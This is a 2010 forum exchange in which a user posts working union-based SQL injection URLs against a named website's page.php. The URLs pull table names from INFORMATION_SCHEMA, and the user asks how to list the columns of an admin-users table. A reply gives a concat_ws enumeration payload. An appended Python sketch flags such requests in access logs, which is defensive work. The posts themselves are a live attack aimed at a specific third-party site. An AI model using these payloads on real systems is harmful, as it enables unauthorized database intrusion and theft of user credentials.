
12.05.2010, 23:27
Quote from B0o0M:
So, there is an injection in MySQL version 5
http://www.wesm.ph/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a) FROM INFORMATION_SCHEMA.TABLES
It outputs the table names; we use limit, that is:
http://www.wesm.ph/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a) FROM INFORMATION_SCHEMA.TABLES+limit+1,1 etc.
Next I want to find out which columns are in which tables. Here is the list of all tables:
I used this query:
http://www.wesm.ph/page.php?p=-7+union+select+COLUMN_NAME%20FROM%20INFORMATION_SC HEMA.COLUMNS+WHERE+TABLE_NAME=char%2839,116,98,108 ,97,100,109,105,110,95,117,115,101,114,115,39%29
But it didn't work. The question is: how do I output all the columns of a table,
and also, sometimes limit doesn't get through; what alternative is there to it?
Thanks in advance.
concat_ws(0x3a,table_schema,table_name,column_name )+from+information_schema.columns+limit+x,1
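Added example, not part of the original posts: a Python sketch of how a defender could flag requests like the ones quoted above in web-server access logs, tolerating `+`, `%20` and stray spaces inside `char(...)`. The request targets are constructed samples, and the signal names and the alert rule (a schema-metadata hit, or any two signals) are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signals are matched on the decoded, lower-cased query string.
SIGNALS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_metadata": re.compile(r"\binformation_schema\s*\.\s*\w+"),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)*\s*\)"),
    "row_paging": re.compile(r"\blimit\s+\d+\s*,\s*\d+"),
}
CHAR_CALL = re.compile(r"\bchar\s*\(([\d\s,]+)\)")

# Constructed request targets (sample data, no real host).
SAMPLE_REQUESTS = [
    "/page.php?p=7",
    "/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a)"
    "+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1",
    "/page.php?p=-7+union+select+COLUMN_NAME%20FROM%20information_schema.columns"
    "+WHERE+TABLE_NAME=char%28117,115 ,101,114,115%29",
    "/news.php?id=12&title=student+union+select+committee",
]

def normalize(target):
    """Decode %XX and '+', lower-case, drop /* */ comments, collapse spaces."""
    text = unquote_plus(urlsplit(target).query).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def decode_char_calls(text):
    """Turn char(117,115,...) into readable text for the analyst."""
    decoded = []
    for match in CHAR_CALL.finditer(text):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes if c < 0x110000))
    return decoded

def inspect(target):
    text = normalize(target)
    hits = sorted(name for name, rx in SIGNALS.items() if rx.search(text))
    # One weak signal alone (e.g. the words "union select" in a title)
    # does not alert; metadata access or two signals together do.
    alert = "schema_metadata" in hits or len(hits) >= 2
    return {"alert": alert, "signals": hits, "decoded": decode_char_calls(text)}

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(inspect(request), request[:60])
```
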